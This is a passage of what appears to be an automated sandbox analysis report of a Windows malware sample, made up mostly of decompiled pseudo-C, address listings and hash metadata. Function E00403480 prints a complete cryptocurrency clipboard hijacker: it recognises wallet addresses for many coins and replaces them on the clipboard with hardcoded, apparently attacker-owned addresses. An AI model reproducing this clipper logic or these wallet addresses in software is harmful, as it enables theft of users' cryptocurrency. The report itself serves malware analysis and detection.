                                                                                  					_v8 =  *(_t1925 + _t1731 * 8 - 0x14) &  *(_t2148 + _t1567 * 8 - 0x2c) ^ _v8;
                                                                                  					_t1926 = _v16;
                                                                                  					_t1568 = _a4;
                                                                                  					_t1735 = _v16;
                                                                                  					_t2149 = _a4;
                                                                                  					_v12 =  *(_t1568 + _t1926 * 8 - 0x80) &  *(_t2149 + _t1735 * 8 - 0x1a0) ^ _v12;
                                                                                  					_v8 =  *(_t1568 + _t1926 * 8 - 0x7c) &  *(_t2149 + _t1735 * 8 - 0x19c) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1738 = _v16;
                                                                                  					_t2150 = _a4;
                                                                                  					 *(_t2150 + 0x78 + _t1738 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2150 + 0x7c + _t1738 * 8) = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					L0040F198();
                                                                                  					_v28 = _v28 ^ _v28 ^ _v28 &  *0x411130;
                                                                                  					_v24 = _v24 ^ _v24 ^ _v24 &  *0x411134;
                                                                                  					_v16 = _v16 + 0x10;
                                                                                  					_v32 = _v32 + 0x10;
                                                                                  				}
                                                                                  				return _t1396;
                                                                                  			}












































































































































































































































                                                                                  0x00406958
                                                                                  0x0040695d
                                                                                  0x00406960
                                                                                  0x00406966
                                                                                  0x00406969
                                                                                  0x00406970
                                                                                  0x00406982
                                                                                  0x00406985
                                                                                  0x0040698b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406994
                                                                                  0x0040699a
                                                                                  0x0040699d
                                                                                  0x004069a0
                                                                                  0x004069b7
                                                                                  0x004069ba
                                                                                  0x004069bd
                                                                                  0x004069c0
                                                                                  0x004069d7
                                                                                  0x004069da
                                                                                  0x004069dd
                                                                                  0x004069e0
                                                                                  0x004069e3
                                                                                  0x004069e6
                                                                                  0x00406a0b
                                                                                  0x00406a0e
                                                                                  0x00406a11
                                                                                  0x00406a14
                                                                                  0x00406a17
                                                                                  0x00406a1a
                                                                                  0x00406a3f
                                                                                  0x00406a42
                                                                                  0x00406a4d
                                                                                  0x00406a58
                                                                                  0x00406a5b
                                                                                  0x00406a66
                                                                                  0x00406a71
                                                                                  0x00406a74
                                                                                  0x00406a77
                                                                                  0x00406a7a
                                                                                  0x00406a81
                                                                                  0x00406a87
                                                                                  0x00406a8a
                                                                                  0x00406a8d
                                                                                  0x00406aa4
                                                                                  0x00406aa7
                                                                                  0x00406aaa
                                                                                  0x00406aad
                                                                                  0x00406abe
                                                                                  0x00406ac1
                                                                                  0x00406ac4
                                                                                  0x00406ac7
                                                                                  0x00406aca
                                                                                  0x00406acd
                                                                                  0x00406af2
                                                                                  0x00406af5
                                                                                  0x00406af8
                                                                                  0x00406afb
                                                                                  0x00406afe
                                                                                  0x00406b01
                                                                                  0x00406b26
                                                                                  0x00406b29
                                                                                  0x00406b34
                                                                                  0x00406b3f
                                                                                  0x00406b42
                                                                                  0x00406b4d
                                                                                  0x00406b58
                                                                                  0x00406b5b
                                                                                  0x00406b5e
                                                                                  0x00406b62
                                                                                  0x00406b69
                                                                                  0x00406b6f
                                                                                  0x00406b72
                                                                                  0x00406b75
                                                                                  0x00406b8c
                                                                                  0x00406b8f
                                                                                  0x00406b92
                                                                                  0x00406b95
                                                                                  0x00406ba6
                                                                                  0x00406ba9
                                                                                  0x00406bac
                                                                                  0x00406baf
                                                                                  0x00406bb2
                                                                                  0x00406bb5
                                                                                  0x00406bd4
                                                                                  0x00406bd7
                                                                                  0x00406bda
                                                                                  0x00406bdd
                                                                                  0x00406be0
                                                                                  0x00406be3
                                                                                  0x00406c08
                                                                                  0x00406c0b
                                                                                  0x00406c16
                                                                                  0x00406c21
                                                                                  0x00406c24
                                                                                  0x00406c2f
                                                                                  0x00406c3a
                                                                                  0x00406c3d
                                                                                  0x00406c40
                                                                                  0x00406c44
                                                                                  0x00406c4b
                                                                                  0x00406c51
                                                                                  0x00406c54
                                                                                  0x00406c57
                                                                                  0x00406c6e
                                                                                  0x00406c71
                                                                                  0x00406c74
                                                                                  0x00406c77
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8e
                                                                                  0x00406c91
                                                                                  0x00406c94
                                                                                  0x00406c97
                                                                                  0x00406cb6
                                                                                  0x00406cb9
                                                                                  0x00406cbc
                                                                                  0x00406cbf
                                                                                  0x00406cc2
                                                                                  0x00406cc5
                                                                                  0x00406cea
                                                                                  0x00406ced
                                                                                  0x00406cf8
                                                                                  0x00406d03
                                                                                  0x00406d06
                                                                                  0x00406d11
                                                                                  0x00406d1c
                                                                                  0x00406d1f
                                                                                  0x00406d22
                                                                                  0x00406d26
                                                                                  0x00406d2d
                                                                                  0x00406d33
                                                                                  0x00406d36
                                                                                  0x00406d39
                                                                                  0x00406d50
                                                                                  0x00406d53
                                                                                  0x00406d56
                                                                                  0x00406d59
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d70
                                                                                  0x00406d73
                                                                                  0x00406d76
                                                                                  0x00406d79
                                                                                  0x00406d98
                                                                                  0x00406d9b
                                                                                  0x00406d9e
                                                                                  0x00406da1
                                                                                  0x00406da4
                                                                                  0x00406da7
                                                                                  0x00406dcc
                                                                                  0x00406dcf
                                                                                  0x00406dda
                                                                                  0x00406de5
                                                                                  0x00406de8
                                                                                  0x00406df3
                                                                                  0x00406dfe
                                                                                  0x00406e01
                                                                                  0x00406e04
                                                                                  0x00406e08
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e18
                                                                                  0x00406e1b
                                                                                  0x00406e32
                                                                                  0x00406e35
                                                                                  0x00406e38
                                                                                  0x00406e3b
                                                                                  0x00406e4c
                                                                                  0x00406e4f
                                                                                  0x00406e52
                                                                                  0x00406e55
                                                                                  0x00406e58
                                                                                  0x00406e5b
                                                                                  0x00406e74
                                                                                  0x00406e77
                                                                                  0x00406e7a
                                                                                  0x00406e7d
                                                                                  0x00406e80
                                                                                  0x00406e83
                                                                                  0x00406ea8
                                                                                  0x00406eab
                                                                                  0x00406eb6
                                                                                  0x00406ec1
                                                                                  0x00406ec4
                                                                                  0x00406ecf
                                                                                  0x00406eda
                                                                                  0x00406edd
                                                                                  0x00406ee0
                                                                                  0x00406ee4
                                                                                  0x00406eeb
                                                                                  0x00406ef1
                                                                                  0x00406ef4
                                                                                  0x00406ef7
                                                                                  0x00406f0e
                                                                                  0x00406f11
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f28
                                                                                  0x00406f2b
                                                                                  0x00406f2e
                                                                                  0x00406f31
                                                                                  0x00406f34
                                                                                  0x00406f37
                                                                                  0x00406f50
                                                                                  0x00406f53
                                                                                  0x00406f56
                                                                                  0x00406f59
                                                                                  0x00406f5c
                                                                                  0x00406f5f
                                                                                  0x00406f84
                                                                                  0x00406f87
                                                                                  0x00406f92
                                                                                  0x00406f9d
                                                                                  0x00406fa0
                                                                                  0x00406fab
                                                                                  0x00406fb6
                                                                                  0x00406fb9
                                                                                  0x00406fbc
                                                                                  0x00406fc0
                                                                                  0x00406fc7
                                                                                  0x00406fcd
                                                                                  0x00406fd0
                                                                                  0x00406fd3
                                                                                  0x00406fea
                                                                                  0x00406fed
                                                                                  0x00406ff0
                                                                                  0x00406ff3
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x0040700d
                                                                                  0x00407010
                                                                                  0x00407013
                                                                                  0x0040702c
                                                                                  0x0040702f
                                                                                  0x00407032
                                                                                  0x00407035
                                                                                  0x00407038
                                                                                  0x0040703b
                                                                                  0x00407060
                                                                                  0x00407063
                                                                                  0x0040706e
                                                                                  0x00407079
                                                                                  0x0040707c
                                                                                  0x00407087
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x00407098
                                                                                  0x0040709c
                                                                                  0x004070a3
                                                                                  0x004070a9
                                                                                  0x004070ac
                                                                                  0x004070af
                                                                                  0x004070c6
                                                                                  0x004070c9
                                                                                  0x004070cc
                                                                                  0x004070cf
                                                                                  0x004070e0
                                                                                  0x004070e3
                                                                                  0x004070e6
                                                                                  0x004070e9
                                                                                  0x004070ec
                                                                                  0x004070ef
                                                                                  0x00407108
                                                                                  0x0040710b
                                                                                  0x0040710e
                                                                                  0x00407111
                                                                                  0x00407114
                                                                                  0x00407117
                                                                                  0x0040713c
                                                                                  0x0040713f
                                                                                  0x0040714a
                                                                                  0x00407155
                                                                                  0x00407158
                                                                                  0x00407163
                                                                                  0x0040716e
                                                                                  0x00407171
                                                                                  0x00407174
                                                                                  0x00407178
                                                                                  0x0040717f
                                                                                  0x00407185
                                                                                  0x00407188
                                                                                  0x0040718b
                                                                                  0x004071a2
                                                                                  0x004071a5
                                                                                  0x004071a8
                                                                                  0x004071ab
                                                                                  0x004071bc
                                                                                  0x004071bf
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071c8
                                                                                  0x004071cb
                                                                                  0x004071e4
                                                                                  0x004071e7
                                                                                  0x004071ea
                                                                                  0x004071ed
                                                                                  0x004071f0
                                                                                  0x004071f3
                                                                                  0x00407218
                                                                                  0x0040721b
                                                                                  0x00407226
                                                                                  0x00407231
                                                                                  0x00407234
                                                                                  0x0040723f
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407254
                                                                                  0x0040725b
                                                                                  0x00407261
                                                                                  0x00407264
                                                                                  0x00407267
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x00407284
                                                                                  0x00407287
                                                                                  0x00407298
                                                                                  0x0040729b
                                                                                  0x0040729e
                                                                                  0x004072a1
                                                                                  0x004072a4
                                                                                  0x004072a7
                                                                                  0x004072c0
                                                                                  0x004072c3
                                                                                  0x004072c6
                                                                                  0x004072c9
                                                                                  0x004072cc
                                                                                  0x004072cf
                                                                                  0x004072f4
                                                                                  0x004072f7
                                                                                  0x00407302
                                                                                  0x0040730d
                                                                                  0x00407310
                                                                                  0x0040731b
                                                                                  0x00407326
                                                                                  0x00407329
                                                                                  0x0040732c
                                                                                  0x00407330
                                                                                  0x00407337
                                                                                  0x0040733d
                                                                                  0x00407340
                                                                                  0x00407343
                                                                                  0x0040735a
                                                                                  0x0040735d
                                                                                  0x00407360
                                                                                  0x00407363
                                                                                  0x00407374
                                                                                  0x00407377
                                                                                  0x0040737a
                                                                                  0x0040737d
                                                                                  0x00407380
                                                                                  0x00407383
                                                                                  0x0040739c
                                                                                  0x0040739f
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x004073ab
                                                                                  0x004073d0
                                                                                  0x004073d3
                                                                                  0x004073de
                                                                                  0x004073e9
                                                                                  0x004073ec
                                                                                  0x004073f7
                                                                                  0x00407402
                                                                                  0x00407405
                                                                                  0x00407408
                                                                                  0x0040740c
                                                                                  0x00407413
                                                                                  0x00407419
                                                                                  0x0040741c
                                                                                  0x0040741f
                                                                                  0x00407436
                                                                                  0x00407439
                                                                                  0x0040743c
                                                                                  0x0040743f
                                                                                  0x00407450
                                                                                  0x00407453
                                                                                  0x00407456
                                                                                  0x00407459
                                                                                  0x0040745c
                                                                                  0x0040745f
                                                                                  0x00407478
                                                                                  0x0040747b
                                                                                  0x0040747e
                                                                                  0x00407481
                                                                                  0x00407484
                                                                                  0x00407487
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074ba
                                                                                  0x004074c5
                                                                                  0x004074c8
                                                                                  0x004074d3
                                                                                  0x004074de
                                                                                  0x004074e1
                                                                                  0x004074e4
                                                                                  0x004074e8
                                                                                  0x004074ef
                                                                                  0x004074f5
                                                                                  0x004074f8
                                                                                  0x004074fb
                                                                                  0x00407512
                                                                                  0x00407515
                                                                                  0x00407518
                                                                                  0x0040751b
                                                                                  0x0040752c
                                                                                  0x0040752f
                                                                                  0x00407532
                                                                                  0x00407535
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407554
                                                                                  0x00407557
                                                                                  0x0040755a
                                                                                  0x0040755d
                                                                                  0x00407560
                                                                                  0x00407563
                                                                                  0x00407588
                                                                                  0x0040758b
                                                                                  0x00407596
                                                                                  0x004075a1
                                                                                  0x004075a4
                                                                                  0x004075af
                                                                                  0x004075ba
                                                                                  0x004075bd
                                                                                  0x004075c0
                                                                                  0x004075c4
                                                                                  0x004075cb
                                                                                  0x004075d1
                                                                                  0x004075d4
                                                                                  0x004075d7
                                                                                  0x004075ee
                                                                                  0x004075f1
                                                                                  0x004075f4
                                                                                  0x004075f7
                                                                                  0x00407608
                                                                                  0x0040760b
                                                                                  0x0040760e
                                                                                  0x00407611
                                                                                  0x00407614
                                                                                  0x00407617
                                                                                  0x00407630
                                                                                  0x00407633
                                                                                  0x00407636
                                                                                  0x00407639
                                                                                  0x0040763c
                                                                                  0x0040763f
                                                                                  0x00407664
                                                                                  0x00407667
                                                                                  0x00407672
                                                                                  0x0040767d
                                                                                  0x00407680
                                                                                  0x0040768b
                                                                                  0x00407696
                                                                                  0x00407699
                                                                                  0x0040769c
                                                                                  0x004076a0
                                                                                  0x004076a7
                                                                                  0x004076ad
                                                                                  0x004076b0
                                                                                  0x004076b3
                                                                                  0x004076ca
                                                                                  0x004076cd
                                                                                  0x004076d0
                                                                                  0x004076d3
                                                                                  0x004076e4
                                                                                  0x004076e7
                                                                                  0x004076ea
                                                                                  0x004076ed
                                                                                  0x004076f0
                                                                                  0x004076f3
                                                                                  0x0040770c
                                                                                  0x0040770f
                                                                                  0x00407712
                                                                                  0x00407715
                                                                                  0x00407718
                                                                                  0x0040771b
                                                                                  0x0040773a
                                                                                  0x0040773d
                                                                                  0x00407748
                                                                                  0x00407753
                                                                                  0x00407756
                                                                                  0x00407761
                                                                                  0x0040776c
                                                                                  0x0040776f
                                                                                  0x00407772
                                                                                  0x00407776
                                                                                  0x00407782
                                                                                  0x00407793
                                                                                  0x004077b2
                                                                                  0x004077b5
                                                                                  0x004077be
                                                                                  0x0040697f
                                                                                  0x0040697f
                                                                                  0x004077cb

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID: Y
                                                                                  • API String ID: 673498613-3233089245
                                                                                  • Opcode ID: 2a5d5167951d52ce8f584bbc4de778dcb98c56809701612ab41b57e5b9c64712
                                                                                  • Instruction ID: b315148e9ffe19411831e1efe01d485e7947b0a89cbfd82e3e47e8b0a1ae8d25
                                                                                  • Opcode Fuzzy Hash: 2a5d5167951d52ce8f584bbc4de778dcb98c56809701612ab41b57e5b9c64712
                                                                                  • Instruction Fuzzy Hash: B8D22D79D11619EFCB54CF99C18099EFBF1FF88320F62859A9845AB305C630AE95DF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E00403480(WCHAR* _a4) {
                                                                                  				int _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				int _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t237;
                                                                                  				signed int _t238;
                                                                                  				void* _t391;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = lstrlenW(_a4);
                                                                                  				if(( *_a4 & 0x0000ffff) != 0x31 && ( *_a4 & 0x0000ffff) != 0x33 && ( *_a4 & 0x0000ffff) != 0x58 && ( *_a4 & 0x0000ffff) != 0x44 && ( *_a4 & 0x0000ffff) != 0x30 && ( *_a4 & 0x0000ffff) != 0x4c && ( *_a4 & 0x0000ffff) != 0x72 && ( *_a4 & 0x0000ffff) != 0x6c && ( *_a4 & 0x0000ffff) != 0x54 && ( *_a4 & 0x0000ffff) != 0x74 && ( *_a4 & 0x0000ffff) != 0x68 && ( *_a4 & 0x0000ffff) != 0x51 && ( *_a4 & 0x0000ffff) != 0x52 && ( *_a4 & 0x0000ffff) != 0x4e && ( *_a4 & 0x0000ffff) != 0x41 && ( *_a4 & 0x0000ffff) != 0x53 && ( *_a4 & 0x0000ffff) != 0x7a && ( *_a4 & 0x0000ffff) != 0x73 && ( *_a4 & 0x0000ffff) != 0x71 && ( *_a4 & 0x0000ffff) != 0x63 && ( *_a4 & 0x0000ffff) != 0x34 && ( *_a4 & 0x0000ffff) != 0x61 && ( *_a4 & 0x0000ffff) != 0x46 && ( *_a4 & 0x0000ffff) != 0x47 && ( *_a4 & 0x0000ffff) != 0x62 && ( *_a4 & 0x0000ffff) != 0x55 && ( *_a4 & 0x0000ffff) != 0x45 && ( *_a4 & 0x0000ffff) != 0x42) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				if(( *_a4 & 0x0000ffff) != 0x34) {
                                                                                  					if(( *_a4 & 0x0000ffff) != 0x72) {
                                                                                  						if(StrStrW(_a4, L"bitcoincash:") == 0) {
                                                                                  							if(StrStrW(_a4, L"cosmos") == 0) {
                                                                                  								if(StrStrW(_a4, L"addr") == 0) {
                                                                                  									if(( *_a4 & 0x0000ffff) == 0x55 || ( *_a4 & 0x0000ffff) == 0x45 || ( *_a4 & 0x0000ffff) == 0x42) {
                                                                                  										if(_v8 == 9) {
                                                                                  											goto L63;
                                                                                  										}
                                                                                  										return 0;
                                                                                  									} else {
                                                                                  										if(_v8 < 0x15 || _v8 > 0x38) {
                                                                                  											return 0;
                                                                                  										} else {
                                                                                  											goto L63;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								if(_v8 < 0x62 || _v8 > 0x69) {
                                                                                  									return 0;
                                                                                  								} else {
                                                                                  									goto L63;
                                                                                  								}
                                                                                  							}
                                                                                  							if(_v8 < 0x2a || _v8 > 0x30) {
                                                                                  								return 0;
                                                                                  							} else {
                                                                                  								goto L63;
                                                                                  							}
                                                                                  						}
                                                                                  						if(_v8 < 0x32 || _v8 > 0x38) {
                                                                                  							return 0;
                                                                                  						} else {
                                                                                  							goto L63;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_v8 < 0x19 || _v8 > 0x23) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					goto L63;
                                                                                  				} else {
                                                                                  					if(_v8 < 0x5f || _v8 > 0x6a) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					L63:
                                                                                  					if(StrStrW(_a4, L"bitcoincash:") != 0) {
                                                                                  						L76:
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x31) {
                                                                                  							if(_v8 != 0x30) {
                                                                                  								_v12 = "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD";
                                                                                  							} else {
                                                                                  								_v12 = "12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc";
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x33) {
                                                                                  							if((_a4[1] & 0x0000ffff) != 0x50) {
                                                                                  								_v12 = "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz";
                                                                                  							} else {
                                                                                  								_v12 = "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg";
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x6c) {
                                                                                  							_v12 = "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x71) {
                                                                                  							_v12 = "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x58) {
                                                                                  							_v12 = "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x44) {
                                                                                  							_v12 = "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x30) {
                                                                                  							_v12 = "0xb899fC445a1b61Cdd62266795193203aa72351fE";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x4c) {
                                                                                  							_v12 = "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x72) {
                                                                                  							_v12 = "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x54) {
                                                                                  							_v12 = "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x74) {
                                                                                  							if((_a4[1] & 0x0000ffff) == 0x31 || (_a4[1] & 0x0000ffff) == 0x32) {
                                                                                  								_v12 = "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy";
                                                                                  							} else {
                                                                                  								if((_a4[1] & 0x0000ffff) != 0x65 || (_a4[2] & 0x0000ffff) != 0x72 || (_a4[3] & 0x0000ffff) != 0x72 || (_a4[4] & 0x0000ffff) != 0x61) {
                                                                                  									_v12 = "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L";
                                                                                  								} else {
                                                                                  									_v12 = "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3";
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x68) {
                                                                                  							_v12 = "hxc65003fbd738014cf286edf92f9ddac689ec4de5";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x51) {
                                                                                  							_v12 = "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x52) {
                                                                                  							_v12 = "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x4e) {
                                                                                  							_v12 = "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x41) {
                                                                                  							_v12 = "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x53) {
                                                                                  							_v12 = "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x7a) {
                                                                                  							_v12 = "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x73) {
                                                                                  							_v12 = "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe";
                                                                                  						}
                                                                                  						if(StrStrW(_a4, L"bitcoincash") != 0) {
                                                                                  							_v12 = "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k";
                                                                                  						}
                                                                                  						if(StrStrW(_a4, L"cosmos") != 0) {
                                                                                  							_v12 = "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x34) {
                                                                                  							_v12 = "4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK";
                                                                                  						}
                                                                                  						if(StrStrW(_a4, L"addr") != 0) {
                                                                                  							_v12 = "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x61 && (_a4[1] & 0x0000ffff) != 0x64) {
                                                                                  							_v12 = "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x46) {
                                                                                  							_v12 = "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x47) {
                                                                                  							if(_v8 != 0x38) {
                                                                                  								_v12 = "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg";
                                                                                  							} else {
                                                                                  								_v12 = "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY";
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x62) {
                                                                                  							if(StrStrW(_a4, L"bnb") != 0) {
                                                                                  								_v12 = "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky";
                                                                                  							}
                                                                                  							if(StrStrW(_a4, L"band") != 0) {
                                                                                  								_v12 = "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945";
                                                                                  							}
                                                                                  							if(StrStrW(_a4, L"bc1") != 0) {
                                                                                  								_v12 = "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v";
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x55) {
                                                                                  							_v12 = "U33390790";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x45) {
                                                                                  							_v12 = "E36963824";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x42) {
                                                                                  							_v12 = "B36461211";
                                                                                  						}
                                                                                  						_v16 = lstrlenA(_v12);
                                                                                  						if(_v16 != 0) {
                                                                                  							_v24 = GlobalAlloc(0x2002, _v16 + 1);
                                                                                  							if(_v24 != 0) {
                                                                                  								_v20 = GlobalLock(_v24);
                                                                                  								if(_v20 != 0) {
                                                                                  									memcpy(_v20, _v12, _v16 + 1);
                                                                                  									GlobalUnlock(_v24);
                                                                                  									if(OpenClipboard(0) != 0) {
                                                                                  										EmptyClipboard();
                                                                                  										SetClipboardData(1, _v24);
                                                                                  										CloseClipboard();
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						return 1;
                                                                                  					}
                                                                                  					_v28 = 0;
                                                                                  					while(_v28 < _v8) {
                                                                                  						if(( *_a4 & 0x0000ffff) != 0x31 || (_a4[_v28] & 0x0000ffff) != 0x4f && (_a4[_v28] & 0x0000ffff) != 0x49 && (_a4[_v28] & 0x0000ffff) != 0x6c) {
                                                                                  							_t237 = _v28;
                                                                                  							_push(_a4[_t237] & 0x0000ffff);
                                                                                  							L0040F058();
                                                                                  							_t391 = _t391 + 4;
                                                                                  							if(_t237 != 0) {
                                                                                  								L75:
                                                                                  								_v28 = _v28 + 1;
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t238 = _v28;
                                                                                  							_push(_a4[_t238] & 0x0000ffff);
                                                                                  							L0040F05E();
                                                                                  							_t391 = _t391 + 4;
                                                                                  							if(_t238 != 0) {
                                                                                  								goto L75;
                                                                                  							}
                                                                                  							return 0;
                                                                                  						} else {
                                                                                  							return 0;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L76;
                                                                                  				}
                                                                                  			}












                                                                                  0x00403486
                                                                                  0x0040348d
                                                                                  0x0040349e
                                                                                  0x004034aa
                                                                                  0x00000000
                                                                                  0x00403619
                                                                                  0x00403629
                                                                                  0x0040364c
                                                                                  0x00403677
                                                                                  0x004036a2
                                                                                  0x004036ca
                                                                                  0x004036ea
                                                                                  0x00403706
                                                                                  0x00000000
                                                                                  0x0040370f
                                                                                  0x00000000
                                                                                  0x00403711
                                                                                  0x00403715
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403715
                                                                                  0x004036ea
                                                                                  0x004036d0
                                                                                  0x00000000
                                                                                  0x004036df
                                                                                  0x00000000
                                                                                  0x004036df
                                                                                  0x004036d0
                                                                                  0x004036a8
                                                                                  0x00000000
                                                                                  0x004036b7
                                                                                  0x00000000
                                                                                  0x004036b7
                                                                                  0x004036a8
                                                                                  0x0040367d
                                                                                  0x00000000
                                                                                  0x0040368c
                                                                                  0x00000000
                                                                                  0x0040368c
                                                                                  0x0040367d
                                                                                  0x00403652
                                                                                  0x00000000
                                                                                  0x0040365a
                                                                                  0x00000000
                                                                                  0x0040362b
                                                                                  0x0040362f
                                                                                  0x00000000
                                                                                  0x00403637
                                                                                  0x00403724
                                                                                  0x00403735
                                                                                  0x004037ce
                                                                                  0x004037d7
                                                                                  0x004037dd
                                                                                  0x004037e8
                                                                                  0x004037df
                                                                                  0x004037df
                                                                                  0x004037df
                                                                                  0x004037dd
                                                                                  0x004037f8
                                                                                  0x00403804
                                                                                  0x0040380f
                                                                                  0x00403806
                                                                                  0x00403806
                                                                                  0x00403806
                                                                                  0x00403804
                                                                                  0x0040381f
                                                                                  0x00403821
                                                                                  0x00403821
                                                                                  0x00403831
                                                                                  0x00403833
